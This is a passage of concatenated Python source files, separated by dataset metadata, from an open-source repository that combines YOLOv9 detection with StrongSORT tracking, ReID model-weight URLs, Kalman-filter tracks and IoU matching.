print('No URL associated to the chosen DeepSort weights. Choose between:')
show_downloadeable_models()
exit()
self.extractor = FeatureExtractor(
# get rid of dataset information DeepSort model name
model_name=model_name,
model_path=weights,
device=str(device)
)
self.extractor.model.half() if fp16 else self.extractor.model.float()
elif self.onnx: # ONNX Runtime
# LOGGER.info(f'Loading {w} for ONNX Runtime inference...')
cuda = torch.cuda.is_available()
#check_requirements(('onnx', 'onnxruntime-gpu' if cuda else 'onnxruntime'))
import onnxruntime
providers = ['CUDAExecutionProvider', 'CPUExecutionProvider'] if cuda else ['CPUExecutionProvider']
self.session = onnxruntime.InferenceSession(w, providers=providers)
elif self.tflite:
try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu
from tflite_runtime.interpreter import Interpreter, load_delegate
except ImportError:
import tensorflow as tf
Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate,
self.interpreter = tf.lite.Interpreter(model_path=weights)
self.interpreter.allocate_tensors()
# Get input and output tensors.
self.input_details = self.interpreter.get_input_details()
self.output_details = self.interpreter.get_output_details()
# Test model on random input data.
input_data = np.array(np.random.random_sample((1,256,128,3)), dtype=np.float32)
self.interpreter.set_tensor(self.input_details[0]['index'], input_data)
self.interpreter.invoke()
# The function `get_tensor()` returns a copy of the tensor data.
output_data = self.interpreter.get_tensor(self.output_details[0]['index'])
print(output_data.shape)
else:
print('This model framework is not supported yet!')
exit()
pixel_mean=[0.485, 0.456, 0.406]
pixel_std=[0.229, 0.224, 0.225]
self.norm = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(pixel_mean, pixel_std),
])
self.size = (256, 128)
self.fp16 = fp16
self.device = device
def export_formats(self):
# YOLOv5 export formats
x = [
['PyTorch', '-', '.pt', True, True],
['TorchScript', 'torchscript', '.torchscript', True, True],
['ONNX', 'onnx', '.onnx', True, True],
['OpenVINO', 'openvino', '_openvino_model', True, False],
['TensorRT', 'engine', '.engine', False, True],
['CoreML', 'coreml', '.mlmodel', True, False],
['TensorFlow SavedModel', 'saved_model', '_saved_model', True, True],
['TensorFlow GraphDef', 'pb', '.pb', True, True],
['TensorFlow Lite', 'tflite', '.tflite', True, False],
['TensorFlow Edge TPU', 'edgetpu', '_edgetpu.tflite', False, False],
['TensorFlow.js', 'tfjs', '_web_model', False, False],]
return pd.DataFrame(x, columns=['Format', 'Argument', 'Suffix', 'CPU', 'GPU'])
def model_type(self, p='path/to/model.pt'):
# Return model type from model path, i.e. path='path/to/model.onnx' -> type=onnx
suffixes = list(self.export_formats().Suffix) + ['.xml'] # export suffixes
check_suffix(p, suffixes) # checks
p = Path(p).name # eliminate trailing separators
pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs, xml2 = (s in p for s in suffixes)
xml |= xml2 # *_openvino_model or *.xml
tflite &= not edgetpu # *.tflite
return pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs
def warmup(self, imgsz=(1, 256, 128, 3)):
# Warmup model by running inference once
warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb
if any(warmup_types) and self.device.type != 'cpu':
im = torch.zeros(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input
im = im.cpu().numpy()
print(im.shape)
for _ in range(2 if self.jit else 1): #
self.forward(im) # warmup
def preprocess(self, im_crops):
def _resize(im, size):
return cv2.resize(im.astype(np.float32), size)
im = torch.cat([self.norm(_resize(im, self.size)).unsqueeze(0) for im in im_crops], dim=0).float()
im = im.float().to(device=self.device)
return im
def forward(self, im_batch):
im_batch = self.preprocess(im_batch)
b, ch, h, w = im_batch.shape # batch, channel, height, width
features = []
for i in range(0, im_batch.shape[0]):
im = im_batch[i, :, :, :].unsqueeze(0)
if self.fp16 and im.dtype != torch.float16:
im = im.half() # to FP16
if self.pt: # PyTorch
y = self.extractor.model(im)[0]
elif self.jit: # TorchScript
y = self.model(im)[0]
elif self.onnx: # ONNX Runtime
im = im.permute(0, 1, 3, 2).cpu().numpy() # torch to numpy # torch to numpy
y = self.session.run([self.session.get_outputs()[0].name], {self.session.get_inputs()[0].name: im})[0]
elif self.xml: # OpenVINO
im = im.cpu().numpy() # FP32
y = self.executable_network([im])[self.output_layer]
else: # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU)
im = im.permute(0, 3, 2, 1).cpu().numpy() # torch BCHW to numpy BHWC shape(1,320,192,3)
input, output = self.input_details[0], self.output_details[0]
int8 = input['dtype'] == np.uint8 # is TFLite quantized uint8 model
if int8:
scale, zero_point = input['quantization']
im = (im / scale + zero_point).astype(np.uint8) # de-scale
self.interpreter.set_tensor(input['index'], im)
self.interpreter.invoke()
y = torch.tensor(self.interpreter.get_tensor(output['index']))
if int8:
scale, zero_point = output['quantization']
y = (y.astype(np.float32) - zero_point) * scale # re-scale
if isinstance(y, np.ndarray):
y = torch.tensor(y, device=self.device)
features.append(y.squeeze())
return features | 8,599 | Python | .py | 157 | 42.592357 | 118 | 0.59265 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,110 | __init__.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/__init__.py | from .strong_sort import StrongSORT
__all__ = ['StrongSORT', 'build_tracker']
def build_tracker(cfg, use_cuda):
return StrongSORT(cfg.STRONGSORT.REID_CKPT,
max_dist=cfg.STRONGSORT.MAX_DIST, min_confidence=cfg.STRONGSORT.MIN_CONFIDENCE,
nms_max_overlap=cfg.STRONGSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE, n_init=cfg.STRONGSORT.N_INIT, nn_budget=cfg.STRONGSORT.NN_BUDGET, use_cuda=use_cuda)
| 510 | Python | .py | 7 | 63.428571 | 132 | 0.709419 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,111 | strong_sort.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/strong_sort.py | import numpy as np
import torch
import sys
import cv2
import gdown
from os.path import exists as file_exists, join
import torchvision.transforms as transforms
from .sort.nn_matching import NearestNeighborDistanceMetric
from .sort.detection import Detection
from .sort.tracker import Tracker
# from .deep.reid_model_factory import show_downloadeable_models, get_model_url, get_model_name
from torchreid.reid.utils import FeatureExtractor
from torchreid.reid.utils.tools import download_url
from .reid_multibackend import ReIDDetectMultiBackend
__all__ = ['StrongSORT']
class StrongSORT(object):
def __init__(self,
model_weights,
device,
fp16,
max_dist=0.2,
max_iou_distance=0.7,
max_age=70, n_init=3,
nn_budget=100,
mc_lambda=0.995,
ema_alpha=0.9
):
self.model = ReIDDetectMultiBackend(weights=model_weights, device=device, fp16=fp16)
self.max_dist = max_dist
metric = NearestNeighborDistanceMetric(
"cosine", self.max_dist, nn_budget)
self.tracker = Tracker(
metric, max_iou_distance=max_iou_distance, max_age=max_age, n_init=n_init)
def update(self, bbox_xywh, confidences, classes, ori_img):
self.height, self.width = ori_img.shape[:2]
# generate detections
features = self._get_features(bbox_xywh, ori_img)
bbox_tlwh = self._xywh_to_tlwh(bbox_xywh)
detections = [Detection(bbox_tlwh[i], conf, features[i]) for i, conf in enumerate(
confidences)]
# run on non-maximum supression
boxes = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
# update tracker
self.tracker.predict()
self.tracker.update(detections, classes, confidences)
# output bbox identities
outputs = []
for track in self.tracker.tracks:
if not track.is_confirmed() or track.time_since_update > 1:
continue
box = track.to_tlwh()
x1, y1, x2, y2 = self._tlwh_to_xyxy(box)
track_id = track.track_id
class_id = track.class_id
conf = track.conf
outputs.append(np.array([x1, y1, x2, y2, track_id, class_id, conf]))
if len(outputs) > 0:
outputs = np.stack(outputs, axis=0)
return outputs
"""
TODO:
Convert bbox from xc_yc_w_h to xtl_ytl_w_h
Thanks [email protected] for reporting this bug!
"""
@staticmethod
def _xywh_to_tlwh(bbox_xywh):
if isinstance(bbox_xywh, np.ndarray):
bbox_tlwh = bbox_xywh.copy()
elif isinstance(bbox_xywh, torch.Tensor):
bbox_tlwh = bbox_xywh.clone()
bbox_tlwh[:, 0] = bbox_xywh[:, 0] - bbox_xywh[:, 2] / 2.
bbox_tlwh[:, 1] = bbox_xywh[:, 1] - bbox_xywh[:, 3] / 2.
return bbox_tlwh
def _xywh_to_xyxy(self, bbox_xywh):
x, y, w, h = bbox_xywh
x1 = max(int(x - w / 2), 0)
x2 = min(int(x + w / 2), self.width - 1)
y1 = max(int(y - h / 2), 0)
y2 = min(int(y + h / 2), self.height - 1)
return x1, y1, x2, y2
def _tlwh_to_xyxy(self, bbox_tlwh):
"""
TODO:
Convert bbox from xtl_ytl_w_h to xc_yc_w_h
Thanks [email protected] for reporting this bug!
"""
x, y, w, h = bbox_tlwh
x1 = max(int(x), 0)
x2 = min(int(x+w), self.width - 1)
y1 = max(int(y), 0)
y2 = min(int(y+h), self.height - 1)
return x1, y1, x2, y2
def increment_ages(self):
self.tracker.increment_ages()
def _xyxy_to_tlwh(self, bbox_xyxy):
x1, y1, x2, y2 = bbox_xyxy
t = x1
l = y1
w = int(x2 - x1)
h = int(y2 - y1)
return t, l, w, h
def _get_features(self, bbox_xywh, ori_img):
im_crops = []
for box in bbox_xywh:
x1, y1, x2, y2 = self._xywh_to_xyxy(box)
im = ori_img[y1:y2, x1:x2]
im_crops.append(im)
if im_crops:
features = self.model(im_crops)
else:
features = np.array([])
return features
| 4,333 | Python | .py | 113 | 28.911504 | 95 | 0.577191 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,112 | reid_model_factory.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/deep/reid_model_factory.py | __model_types = [
'resnet50', 'mlfn', 'hacnn', 'mobilenetv2_x1_0', 'mobilenetv2_x1_4',
'osnet_x1_0', 'osnet_x0_75', 'osnet_x0_5', 'osnet_x0_25',
'osnet_ibn_x1_0', 'osnet_ain_x1_0']
__trained_urls = {
# market1501 models ########################################################
'resnet50_market1501.pt':
'https://drive.google.com/uc?id=1dUUZ4rHDWohmsQXCRe2C_HbYkzz94iBV',
'resnet50_dukemtmcreid.pt':
'https://drive.google.com/uc?id=17ymnLglnc64NRvGOitY3BqMRS9UWd1wg',
'resnet50_msmt17.pt':
'https://drive.google.com/uc?id=1ep7RypVDOthCRIAqDnn4_N-UhkkFHJsj',
'resnet50_fc512_market1501.pt':
'https://drive.google.com/uc?id=1kv8l5laX_YCdIGVCetjlNdzKIA3NvsSt',
'resnet50_fc512_dukemtmcreid.pt':
'https://drive.google.com/uc?id=13QN8Mp3XH81GK4BPGXobKHKyTGH50Rtx',
'resnet50_fc512_msmt17.pt':
'https://drive.google.com/uc?id=1fDJLcz4O5wxNSUvImIIjoaIF9u1Rwaud',
'mlfn_market1501.pt':
'https://drive.google.com/uc?id=1wXcvhA_b1kpDfrt9s2Pma-MHxtj9pmvS',
'mlfn_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1rExgrTNb0VCIcOnXfMsbwSUW1h2L1Bum',
'mlfn_msmt17.pt':
'https://drive.google.com/uc?id=18JzsZlJb3Wm7irCbZbZ07TN4IFKvR6p-',
'hacnn_market1501.pt':
'https://drive.google.com/uc?id=1LRKIQduThwGxMDQMiVkTScBwR7WidmYF',
'hacnn_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1zNm6tP4ozFUCUQ7Sv1Z98EAJWXJEhtYH',
'hacnn_msmt17.pt':
'https://drive.google.com/uc?id=1MsKRtPM5WJ3_Tk2xC0aGOO7pM3VaFDNZ',
'mobilenetv2_x1_0_market1501.pt':
'https://drive.google.com/uc?id=18DgHC2ZJkjekVoqBWszD8_Xiikz-fewp',
'mobilenetv2_x1_0_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1q1WU2FETRJ3BXcpVtfJUuqq4z3psetds',
'mobilenetv2_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1j50Hv14NOUAg7ZeB3frzfX-WYLi7SrhZ',
'mobilenetv2_x1_4_market1501.pt':
'https://drive.google.com/uc?id=1t6JCqphJG-fwwPVkRLmGGyEBhGOf2GO5',
'mobilenetv2_x1_4_dukemtmcreid.pt':
'https://drive.google.com/uc?id=12uD5FeVqLg9-AFDju2L7SQxjmPb4zpBN',
'mobilenetv2_x1_4_msmt17.pt':
'https://drive.google.com/uc?id=1ZY5P2Zgm-3RbDpbXM0kIBMPvspeNIbXz',
'osnet_x1_0_market1501.pt':
'https://drive.google.com/uc?id=1vduhq5DpN2q1g4fYEZfPI17MJeh9qyrA',
'osnet_x1_0_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1QZO_4sNf4hdOKKKzKc-TZU9WW1v6zQbq',
'osnet_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=112EMUfBPYeYg70w-syK6V6Mx8-Qb9Q1M',
'osnet_x0_75_market1501.pt':
'https://drive.google.com/uc?id=1ozRaDSQw_EQ8_93OUmjDbvLXw9TnfPer',
'osnet_x0_75_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1IE3KRaTPp4OUa6PGTFL_d5_KQSJbP0Or',
'osnet_x0_75_msmt17.pt':
'https://drive.google.com/uc?id=1QEGO6WnJ-BmUzVPd3q9NoaO_GsPNlmWc',
'osnet_x0_5_market1501.pt':
'https://drive.google.com/uc?id=1PLB9rgqrUM7blWrg4QlprCuPT7ILYGKT',
'osnet_x0_5_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1KoUVqmiST175hnkALg9XuTi1oYpqcyTu',
'osnet_x0_5_msmt17.pt':
'https://drive.google.com/uc?id=1UT3AxIaDvS2PdxzZmbkLmjtiqq7AIKCv',
'osnet_x0_25_market1501.pt':
'https://drive.google.com/uc?id=1z1UghYvOTtjx7kEoRfmqSMu-z62J6MAj',
'osnet_x0_25_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1eumrtiXT4NOspjyEV4j8cHmlOaaCGk5l',
'osnet_x0_25_msmt17.pt':
'https://drive.google.com/uc?id=1sSwXSUlj4_tHZequ_iZ8w_Jh0VaRQMqF',
####### market1501 models ##################################################
'resnet50_msmt17.pt':
'https://drive.google.com/uc?id=1yiBteqgIZoOeywE8AhGmEQl7FTVwrQmf',
'osnet_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1IosIFlLiulGIjwW3H8uMRmx3MzPwf86x',
'osnet_x0_75_msmt17.pt':
'https://drive.google.com/uc?id=1fhjSS_7SUGCioIf2SWXaRGPqIY9j7-uw',
'osnet_x0_5_msmt17.pt':
'https://drive.google.com/uc?id=1DHgmb6XV4fwG3n-CnCM0zdL9nMsZ9_RF',
'osnet_x0_25_msmt17.pt':
'https://drive.google.com/uc?id=1Kkx2zW89jq_NETu4u42CFZTMVD5Hwm6e',
'osnet_ibn_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1q3Sj2ii34NlfxA4LvmHdWO_75NDRmECJ',
'osnet_ain_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1SigwBE6mPdqiJMqhuIY4aqC7--5CsMal',
}
def show_downloadeable_models():
print('\nAvailable .pt ReID models for automatic download')
print(list(__trained_urls.keys()))
def get_model_url(model):
model = str(model).rsplit('/', 1)[-1]
if model in __trained_urls:
return __trained_urls[model]
else:
None
def is_model_in_model_types(model):
model = str(model).rsplit('/', 1)[-1].split('.')[0]
if model in __model_types:
return True
else:
return False
def get_model_name(model):
model = str(model).rsplit('/', 1)[-1].split('.')[0]
for x in __model_types:
if x in model:
return x
return None
| 4,862 | Python | .py | 103 | 41.990291 | 80 | 0.696855 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,113 | iou_matching.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/iou_matching.py | # vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import linear_assignment
def iou(bbox, candidates):
"""Computer intersection over union.
Parameters
----------
bbox : ndarray
A bounding box in format `(top left x, top left y, width, height)`.
candidates : ndarray
A matrix of candidate bounding boxes (one per row) in the same format
as `bbox`.
Returns
-------
ndarray
The intersection over union in [0, 1] between the `bbox` and each
candidate. A higher score means a larger fraction of the `bbox` is
occluded by the candidate.
"""
bbox_tl, bbox_br = bbox[:2], bbox[:2] + bbox[2:]
candidates_tl = candidates[:, :2]
candidates_br = candidates[:, :2] + candidates[:, 2:]
tl = np.c_[np.maximum(bbox_tl[0], candidates_tl[:, 0])[:, np.newaxis],
np.maximum(bbox_tl[1], candidates_tl[:, 1])[:, np.newaxis]]
br = np.c_[np.minimum(bbox_br[0], candidates_br[:, 0])[:, np.newaxis],
np.minimum(bbox_br[1], candidates_br[:, 1])[:, np.newaxis]]
wh = np.maximum(0., br - tl)
area_intersection = wh.prod(axis=1)
area_bbox = bbox[2:].prod()
area_candidates = candidates[:, 2:].prod(axis=1)
return area_intersection / (area_bbox + area_candidates - area_intersection)
def iou_cost(tracks, detections, track_indices=None,
detection_indices=None):
"""An intersection over union distance metric.
Parameters
----------
tracks : List[deep_sort.track.Track]
A list of tracks.
detections : List[deep_sort.detection.Detection]
A list of detections.
track_indices : Optional[List[int]]
A list of indices to tracks that should be matched. Defaults to
all `tracks`.
detection_indices : Optional[List[int]]
A list of indices to detections that should be matched. Defaults
to all `detections`.
Returns
-------
ndarray
Returns a cost matrix of shape
len(track_indices), len(detection_indices) where entry (i, j) is
`1 - iou(tracks[track_indices[i]], detections[detection_indices[j]])`.
"""
if track_indices is None:
track_indices = np.arange(len(tracks))
if detection_indices is None:
detection_indices = np.arange(len(detections))
cost_matrix = np.zeros((len(track_indices), len(detection_indices)))
for row, track_idx in enumerate(track_indices):
if tracks[track_idx].time_since_update > 1:
cost_matrix[row, :] = linear_assignment.INFTY_COST
continue
bbox = tracks[track_idx].to_tlwh()
candidates = np.asarray(
[detections[i].tlwh for i in detection_indices])
cost_matrix[row, :] = 1. - iou(bbox, candidates)
return cost_matrix
| 2,843 | Python | .py | 68 | 34.911765 | 80 | 0.635277 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,114 | track.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/track.py | # vim: expandtab:ts=4:sw=4
import cv2
import numpy as np
from strong_sort.sort.kalman_filter import KalmanFilter
class TrackState:
"""
Enumeration type for the single target track state. Newly created tracks are
classified as `tentative` until enough evidence has been collected. Then,
the track state is changed to `confirmed`. Tracks that are no longer alive
are classified as `deleted` to mark them for removal from the set of active
tracks.
"""
Tentative = 1
Confirmed = 2
Deleted = 3
class Track:
"""
A single target track with state space `(x, y, a, h)` and associated
velocities, where `(x, y)` is the center of the bounding box, `a` is the
aspect ratio and `h` is the height.
Parameters
----------
mean : ndarray
Mean vector of the initial state distribution.
covariance : ndarray
Covariance matrix of the initial state distribution.
track_id : int
A unique track identifier.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
max_age : int
The maximum number of consecutive misses before the track state is
set to `Deleted`.
feature : Optional[ndarray]
Feature vector of the detection this track originates from. If not None,
this feature is added to the `features` cache.
Attributes
----------
mean : ndarray
Mean vector of the initial state distribution.
covariance : ndarray
Covariance matrix of the initial state distribution.
track_id : int
A unique track identifier.
hits : int
Total number of measurement updates.
age : int
Total number of frames since first occurance.
time_since_update : int
Total number of frames since last measurement update.
state : TrackState
The current track state.
features : List[ndarray]
A cache of features. On each measurement update, the associated feature
vector is added to this list.
"""
def __init__(self, detection, track_id, class_id, conf, n_init, max_age, ema_alpha,
feature=None):
self.track_id = track_id
self.class_id = int(class_id)
self.hits = 1
self.age = 1
self.time_since_update = 0
self.ema_alpha = ema_alpha
self.state = TrackState.Tentative
self.features = []
if feature is not None:
feature /= np.linalg.norm(feature)
self.features.append(feature)
self.conf = conf
self._n_init = n_init
self._max_age = max_age
self.kf = KalmanFilter()
self.mean, self.covariance = self.kf.initiate(detection)
def to_tlwh(self):
"""Get current position in bounding box format `(top left x, top left y,
width, height)`.
Returns
-------
ndarray
The bounding box.
"""
ret = self.mean[:4].copy()
ret[2] *= ret[3]
ret[:2] -= ret[2:] / 2
return ret
def to_tlbr(self):
"""Get kf estimated current position in bounding box format `(min x, miny, max x,
max y)`.
Returns
-------
ndarray
The predicted kf bounding box.
"""
ret = self.to_tlwh()
ret[2:] = ret[:2] + ret[2:]
return ret
def ECC(self, src, dst, warp_mode = cv2.MOTION_EUCLIDEAN, eps = 1e-5,
max_iter = 100, scale = 0.1, align = False):
"""Compute the warp matrix from src to dst.
Parameters
----------
src : ndarray
An NxM matrix of source img(BGR or Gray), it must be the same format as dst.
dst : ndarray
An NxM matrix of target img(BGR or Gray).
warp_mode: flags of opencv
translation: cv2.MOTION_TRANSLATION
rotated and shifted: cv2.MOTION_EUCLIDEAN
affine(shift,rotated,shear): cv2.MOTION_AFFINE
homography(3d): cv2.MOTION_HOMOGRAPHY
eps: float
the threshold of the increment in the correlation coefficient between two iterations
max_iter: int
the number of iterations.
scale: float or [int, int]
scale_ratio: float
scale_size: [W, H]
align: bool
whether to warp affine or perspective transforms to the source image
Returns
-------
warp matrix : ndarray
Returns the warp matrix from src to dst.
if motion models is homography, the warp matrix will be 3x3, otherwise 2x3
src_aligned: ndarray
aligned source image of gray
"""
# skip if current and previous frame are not initialized (1st inference)
if (src.any() or dst.any() is None):
return None, None
# skip if current and previous fames are not the same size
elif (src.shape != dst.shape):
return None, None
# BGR2GRAY
if src.ndim == 3:
# Convert images to grayscale
src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)
dst = cv2.cvtColor(dst, cv2.COLOR_BGR2GRAY)
# make the imgs smaller to speed up
if scale is not None:
if isinstance(scale, float) or isinstance(scale, int):
if scale != 1:
src_r = cv2.resize(src, (0, 0), fx = scale, fy = scale,interpolation = cv2.INTER_LINEAR)
dst_r = cv2.resize(dst, (0, 0), fx = scale, fy = scale,interpolation = cv2.INTER_LINEAR)
scale = [scale, scale]
else:
src_r, dst_r = src, dst
scale = None
else:
if scale[0] != src.shape[1] and scale[1] != src.shape[0]:
src_r = cv2.resize(src, (scale[0], scale[1]), interpolation = cv2.INTER_LINEAR)
dst_r = cv2.resize(dst, (scale[0], scale[1]), interpolation=cv2.INTER_LINEAR)
scale = [scale[0] / src.shape[1], scale[1] / src.shape[0]]
else:
src_r, dst_r = src, dst
scale = None
else:
src_r, dst_r = src, dst
# Define 2x3 or 3x3 matrices and initialize the matrix to identity
if warp_mode == cv2.MOTION_HOMOGRAPHY :
warp_matrix = np.eye(3, 3, dtype=np.float32)
else :
warp_matrix = np.eye(2, 3, dtype=np.float32)
# Define termination criteria
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, max_iter, eps)
# Run the ECC algorithm. The results are stored in warp_matrix.
try:
(cc, warp_matrix) = cv2.findTransformECC (src_r, dst_r, warp_matrix, warp_mode, criteria, None, 1)
except cv2.error as e:
return None, None
if scale is not None:
warp_matrix[0, 2] = warp_matrix[0, 2] / scale[0]
warp_matrix[1, 2] = warp_matrix[1, 2] / scale[1]
if align:
sz = src.shape
if warp_mode == cv2.MOTION_HOMOGRAPHY:
# Use warpPerspective for Homography
src_aligned = cv2.warpPerspective(src, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR)
else :
# Use warpAffine for Translation, Euclidean and Affine
src_aligned = cv2.warpAffine(src, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR)
return warp_matrix, src_aligned
else:
return warp_matrix, None
def get_matrix(self, matrix):
eye = np.eye(3)
dist = np.linalg.norm(eye - matrix)
if dist < 100:
return matrix
else:
return eye
def camera_update(self, previous_frame, next_frame):
warp_matrix, src_aligned = self.ECC(previous_frame, next_frame)
if warp_matrix is None and src_aligned is None:
return
[a,b] = warp_matrix
warp_matrix=np.array([a,b,[0,0,1]])
warp_matrix = warp_matrix.tolist()
matrix = self.get_matrix(warp_matrix)
x1, y1, x2, y2 = self.to_tlbr()
x1_, y1_, _ = matrix @ np.array([x1, y1, 1]).T
x2_, y2_, _ = matrix @ np.array([x2, y2, 1]).T
w, h = x2_ - x1_, y2_ - y1_
cx, cy = x1_ + w / 2, y1_ + h / 2
self.mean[:4] = [cx, cy, w / h, h]
def increment_age(self):
self.age += 1
self.time_since_update += 1
def predict(self, kf):
"""Propagate the state distribution to the current time step using a
Kalman filter prediction step.
Parameters
----------
kf : kalman_filter.KalmanFilter
The Kalman filter.
"""
self.mean, self.covariance = self.kf.predict(self.mean, self.covariance)
self.age += 1
self.time_since_update += 1
def update(self, detection, class_id, conf):
"""Perform Kalman filter measurement update step and update the feature
cache.
Parameters
----------
detection : Detection
The associated detection.
"""
self.conf = conf
self.class_id = class_id.int()
self.mean, self.covariance = self.kf.update(self.mean, self.covariance, detection.to_xyah(), detection.confidence)
feature = detection.feature / np.linalg.norm(detection.feature)
smooth_feat = self.ema_alpha * self.features[-1] + (1 - self.ema_alpha) * feature
smooth_feat /= np.linalg.norm(smooth_feat)
self.features = [smooth_feat]
self.hits += 1
self.time_since_update = 0
if self.state == TrackState.Tentative and self.hits >= self._n_init:
self.state = TrackState.Confirmed
def mark_missed(self):
"""Mark this track as missed (no association at the current time step).
"""
if self.state == TrackState.Tentative:
self.state = TrackState.Deleted
elif self.time_since_update > self._max_age:
self.state = TrackState.Deleted
def is_tentative(self):
"""Returns True if this track is tentative (unconfirmed).
"""
return self.state == TrackState.Tentative
def is_confirmed(self):
"""Returns True if this track is confirmed."""
return self.state == TrackState.Confirmed
def is_deleted(self):
"""Returns True if this track is dead and should be deleted."""
return self.state == TrackState.Deleted
| 10,631 | Python | .py | 258 | 31.44186 | 122 | 0.589358 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,115 | preprocessing.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/preprocessing.py | # vim: expandtab:ts=4:sw=4
import numpy as np
import cv2
def non_max_suppression(boxes, max_bbox_overlap, scores=None):
"""Suppress overlapping detections.
Original code from [1]_ has been adapted to include confidence score.
.. [1] http://www.pyimagesearch.com/2015/02/16/
faster-non-maximum-suppression-python/
Examples
--------
>>> boxes = [d.roi for d in detections]
>>> scores = [d.confidence for d in detections]
>>> indices = non_max_suppression(boxes, max_bbox_overlap, scores)
>>> detections = [detections[i] for i in indices]
Parameters
----------
boxes : ndarray
Array of ROIs (x, y, width, height).
max_bbox_overlap : float
ROIs that overlap more than this values are suppressed.
scores : Optional[array_like]
Detector confidence score.
Returns
-------
List[int]
Returns indices of detections that have survived non-maxima suppression.
"""
if len(boxes) == 0:
return []
boxes = boxes.astype(np.float)
pick = []
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2] + boxes[:, 0]
y2 = boxes[:, 3] + boxes[:, 1]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
if scores is not None:
idxs = np.argsort(scores)
else:
idxs = np.argsort(y2)
while len(idxs) > 0:
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
overlap = (w * h) / area[idxs[:last]]
idxs = np.delete(
idxs, np.concatenate(
([last], np.where(overlap > max_bbox_overlap)[0])))
return pick
| 1,914 | Python | .py | 55 | 27.672727 | 80 | 0.571972 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,116 | nn_matching.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/nn_matching.py | # vim: expandtab:ts=4:sw=4
import numpy as np
import sys
import torch
sys.path.append('strong_sort/deep/reid')
from torchreid.reid.metrics.distance import compute_distance_matrix
def _pdist(a, b):
"""Compute pair-wise squared distance between points in `a` and `b`.
Parameters
----------
a : array_like
An NxM matrix of N samples of dimensionality M.
b : array_like
An LxM matrix of L samples of dimensionality M.
Returns
-------
ndarray
Returns a matrix of size len(a), len(b) such that eleement (i, j)
contains the squared distance between `a[i]` and `b[j]`.
"""
a, b = np.asarray(a), np.asarray(b)
if len(a) == 0 or len(b) == 0:
return np.zeros((len(a), len(b)))
a2, b2 = np.square(a).sum(axis=1), np.square(b).sum(axis=1)
r2 = -2. * np.dot(a, b.T) + a2[:, None] + b2[None, :]
r2 = np.clip(r2, 0., float(np.inf))
return r2
def _cosine_distance(a, b, data_is_normalized=False):
"""Compute pair-wise cosine distance between points in `a` and `b`.
Parameters
----------
a : array_like
An NxM matrix of N samples of dimensionality M.
b : array_like
An LxM matrix of L samples of dimensionality M.
data_is_normalized : Optional[bool]
If True, assumes rows in a and b are unit length vectors.
Otherwise, a and b are explicitly normalized to lenght 1.
Returns
-------
ndarray
